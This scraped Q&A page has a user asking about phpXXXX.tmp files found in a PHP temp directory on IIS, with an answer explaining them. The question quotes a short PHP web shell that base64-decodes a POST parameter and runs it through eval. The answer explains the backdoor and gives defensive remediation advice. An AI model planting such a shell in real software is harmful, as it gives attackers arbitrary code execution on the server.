Logo Questions Linux Laravel Mysql Ubuntu Git Menu
 

PHP code contained in phpXXXX.tmp files in temp directory

Tags:

security

php

temp

I have noticed that our temp directory has a number of what appear to be temporary files with names like phpA3F9.tmp

Looking into the contents I find a number followed by some PHP code, the following code appears in several files

9990000    
<?php 
    $mujj = $_POST['z']; if ($mujj!="") { $xsser=base64_decode($_POST['z0']); @eval("\$safedg = $xsser;"); } ?>

This appears to be an attack attempt, but I presume it relies on the attacker being able to execute the code in the tmp folder.

Can anybody explain what is going on here? What are the risks? How do these files get into the tmp folder? And how do I stop them?

I don't know if it is relevant but we are running PHP 5.5 on IIS

like image 911
Mark_1 Avatar asked Dec 01 '15 14:12

Mark_1


People also ask

Where are PHP temp files stored?

php stores all temporary files, that includes uploaded files, in the temporary files directory as specified in the php. ini.

What are PHP TMP files?

The tmpfile() function in PHP is an inbuilt function which is used to create a temporary file with a unique name in read-write (w+) mode. The file created using tmpfile() function gets automatically deleted when close using fclose() or when there are no remaining references to the file handle.

What does the tmp directory contain?

The /tmp directory is a temporary landing place for files. Users also have write access to this directory, which can be a bad thing, but there is a solution.

Is Web tmp a temporary file?

TMP files: what is the deal with temporary files? Temporary files, also referred to as TMP files, are automatically created and deleted from a computer. They store data temporarily which means they need less memory and thus improve the performance of a computer.


1 Answers

Short story: your server may have already been compromised.

Those are PHP shells - mostly harmless where they are, but if they get into your web root, they'll allow an attacker to execute any arbitrary code on your server.

The key parts to understanding the shell are:

$xsser=base64_decode($_POST['z0']);
@eval("\$safedg = $xsser;");

It accepts any code at all from a $_POST variable, base64_decodes it, and then runs it through eval while suppressing any errors.

It's possible that they're being uploaded through a form on your site, and getting dumped in the temp folder as an intermediate step, with the hope that they would get moved into a web-accessible location. The other option is that there's already a shell or rootkit on your server, and it's putting those files in any writable folders that it can find.

So what to do about it? Check your server logs - if you see any successful connections to a script that you don't recognize, you may be compromised. Look for any upload forms on your site, and lock them down (require user authentication, etc.), and then if you're certain that you're compromised, don't bother trying to clean it. Spin up a new server, migrate your clean code, important files, and data to the clean server.

like image 133
samlev Avatar answered Oct 17 '22 11:10

samlev